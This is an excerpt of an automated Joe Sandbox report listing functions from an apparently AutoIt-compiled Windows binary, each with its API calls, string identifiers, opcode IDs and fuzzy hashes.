                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 97d7beac487d1f1d58ba9b1b5f4834728d6d7ab6ec08519888d3a06100ac54d0
                                                        • Instruction ID: a3697bb6b0180fa81707b9157fb8edf1f320db330b5c189ec7f82c858f8c3c94
                                                        • Opcode Fuzzy Hash: 97d7beac487d1f1d58ba9b1b5f4834728d6d7ab6ec08519888d3a06100ac54d0
                                                        • Instruction Fuzzy Hash: 62211476610209AFDF04DFA8CC85EEA7BA8FB09318F014629F995D2260D735E8519B61
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 001469A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001469B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: ad3dbc24c6d95c404a83d82835d970d9d47ac8c21566963294c557b8c09f75d9
                                                        • Instruction ID: 130d832f88061512fa73ffa7fba1a696b8dec297aa38b7630f000227dcf9d90b
                                                        • Opcode Fuzzy Hash: ad3dbc24c6d95c404a83d82835d970d9d47ac8c21566963294c557b8c09f75d9
                                                        • Instruction Fuzzy Hash: 09116A71100208AFEF108E64DC40AEB37A9EB063BCF604728F9A5972F0C7B1DC919761
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00122A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: d298b23ecfdb5780db05ad80f2a72df414c4f6cab5c9ede2f46580b899047c89
                                                        • Instruction ID: 850214d237dcc92160218e7cc59c101d8c66ed2d72eb170c9c0f6efc1bc9e379
                                                        • Opcode Fuzzy Hash: d298b23ecfdb5780db05ad80f2a72df414c4f6cab5c9ede2f46580b899047c89
                                                        • Instruction Fuzzy Hash: 2D11D032D01134BBCF34DA98FC44BAE77B9EB46304F054021E855EBAA0D770AE2AC791
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0013222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00132255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 026bb534babaf83a2b8cae49f88e2ffc2bc979523eff63bff3d56dc5f040a7da
                                                        • Instruction ID: 1810277f413cd267d58d67f6bcaed3e5e56c4f050e6142e85eb6e78746a4d787
                                                        • Opcode Fuzzy Hash: 026bb534babaf83a2b8cae49f88e2ffc2bc979523eff63bff3d56dc5f040a7da
                                                        • Instruction Fuzzy Hash: 0F11CE70541225FADB29AF518C88EFBFBA8FF16751F10822AFA1586500D3706995D6F0
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00118E73
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: a30dce46c93681b2945d57ba5cc459188af91750cd052d7d28c49d8c4039b85c
                                                        • Instruction ID: 4b81cedef41307cd640442784b01bd4fa71654eebef4d3650aa06681a1e17fdd
                                                        • Opcode Fuzzy Hash: a30dce46c93681b2945d57ba5cc459188af91750cd052d7d28c49d8c4039b85c
                                                        • Instruction Fuzzy Hash: 880124B5602219ABCB18EBA0CC41DFE7778EF06360F144A2DF836672E2EF315848C650
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: bd828a3b9b6005d38c394c0928ca9920ea539ae29446b50f05d5376baa5ed037
                                                        • Instruction ID: d6fb125231d088eedf8aab981a1cb3c5eeb4e30dc726e2f4ee58ccf86e40d634
                                                        • Opcode Fuzzy Hash: bd828a3b9b6005d38c394c0928ca9920ea539ae29446b50f05d5376baa5ed037
                                                        • Instruction Fuzzy Hash: B201F9729042587EDB18CAA9CC16EFE7BF8DB11311F00459AF552D2182E974A6188760
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00118D6B
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: a13e32d798ecd5bf32c5e2f332d5a8f15e2556b7e86d9d121c80b0bbc7d59124
                                                        • Instruction ID: 88eae44dba12ec34d4b4d94e7f21428338b1435d03e2bfcfb7824a834c6954d3
                                                        • Opcode Fuzzy Hash: a13e32d798ecd5bf32c5e2f332d5a8f15e2556b7e86d9d121c80b0bbc7d59124
                                                        • Instruction Fuzzy Hash: B301D4B5A41209ABCF18EBE0D952EFE77B8DF15340F504029B806672E2DF205E48D672
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00118DEE
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 4963a2774a54f163651cbc3eb7e0102db03e2dc6d4f8f28819c013eb5ff752f5
                                                        • Instruction ID: c22da417d23791a600e02e72a7533074be42688e8a31f90ff86592337643308c
                                                        • Opcode Fuzzy Hash: 4963a2774a54f163651cbc3eb7e0102db03e2dc6d4f8f28819c013eb5ff752f5
                                                        • Instruction Fuzzy Hash: 7E01F2B5A41209A7CF18EBE4D942EFE77A8CF15340F108029B80AA32D2DF215E49D672
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 15bc1455926a8437f92e24c3b1cf8fe51859f4f499518b206ccb7d1b4efe1e81
                                                        • Instruction ID: 3cb207083d2a6710342270764835b1ac328eb759bf4d02ed0b114bf4a304a347
                                                        • Opcode Fuzzy Hash: 15bc1455926a8437f92e24c3b1cf8fe51859f4f499518b206ccb7d1b4efe1e81
                                                        • Instruction Fuzzy Hash: 8CE0D1335006386BD7109B59EC49FA7F7ACDB45B71F000067FD14D3151D6609B9587E0
                                                        APIs
                                                          • Part of subcall function 000FB314: _memset.LIBCMT ref: 000FB321
                                                          • Part of subcall function 000E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000FB2F0,?,?,?,000C100A), ref: 000E0945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,000C100A), ref: 000FB2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000C100A), ref: 000FB303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000FB2FE
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 31e28be42fe058a9d659f21a939a4538aa84c1de5a9f8bfdf7d5bd31d38f7d43
                                                        • Instruction ID: 45cdd4a294682ba3444cc92b80d37690ad9c51d959ed6202ca4382ce1137e574
                                                        • Opcode Fuzzy Hash: 31e28be42fe058a9d659f21a939a4538aa84c1de5a9f8bfdf7d5bd31d38f7d43
                                                        • Instruction Fuzzy Hash: 8BE06D746007008FD7209F28D9047967AE4EF00358F01893DE456C7B51EBB5D585CFA1
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00117C82
                                                          • Part of subcall function 000E3358: _doexit.LIBCMT ref: 000E3362
                                                        Strings
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 94f2e161b99261d143fdd3877b6368849529587aba7795bf256f8e1f4fbc9034
                                                        • Instruction ID: 856dbc1bf94e7e0690f93a1488c171165ad20b19abb2e011747fa479e482689b
                                                        • Opcode Fuzzy Hash: 94f2e161b99261d143fdd3877b6368849529587aba7795bf256f8e1f4fbc9034
                                                        • Instruction Fuzzy Hash: 34D05B323C435836D11532B56C0BFDE79484F05B52F144425FF08696E38AD245C141E5
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00101775
                                                          • Part of subcall function 0013BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0010195E,?), ref: 0013BFFE
                                                          • Part of subcall function 0013BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0013C010
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0010196D
                                                        Strings
                                                        Similarity
                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 582185067-3257408948
                                                        • Opcode ID: 719c4d08bd54301104e16458a60e3c0a39e66c5e68161582669be62fd2c454bf
                                                        • Instruction ID: ec6fb178b904c5644d63afe796f84546f3a19367641dc5f893d670285ebe4b91
                                                        • Opcode Fuzzy Hash: 719c4d08bd54301104e16458a60e3c0a39e66c5e68161582669be62fd2c454bf
                                                        • Instruction Fuzzy Hash: 2DF0ED70804109EFDB15DF91C984FECBBF8BB18305F540099E142A65A0D7B58F85DF61
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0014596E
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00145981
                                                          • Part of subcall function 00125244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        Strings
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 9a0a6087fc35843decf92d0d92c302e333c9381340d6729e8575d67db0675612
                                                        • Instruction ID: b9471b75bef95d317d5b67ae45b9ccd6e4d7797d2be0789eb827b00243c235c6
                                                        • Opcode Fuzzy Hash: 9a0a6087fc35843decf92d0d92c302e333c9381340d6729e8575d67db0675612
                                                        • Instruction Fuzzy Hash: A9D0C935784311B6E664AB70AC4FFD66A25AB11B50F014829B249AA6E0DAE09841C654
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001459AE
                                                        • PostMessageW.USER32(00000000), ref: 001459B5
                                                          • Part of subcall function 00125244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        Strings
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 8d199db0c3051daddd639426030b65b9d0a01c4b4484911a6029f727848667f4
                                                        • Instruction ID: 321577c5106562530bd544ad50a663d0aa57a885abf9afc7795e54bf4de65577
                                                        • Opcode Fuzzy Hash: 8d199db0c3051daddd639426030b65b9d0a01c4b4484911a6029f727848667f4
                                                        • Instruction Fuzzy Hash: AED0C9357C0311BAE664AB70AC4FFD66A25AB15B50F014829B249AA6E0DAE0A841C654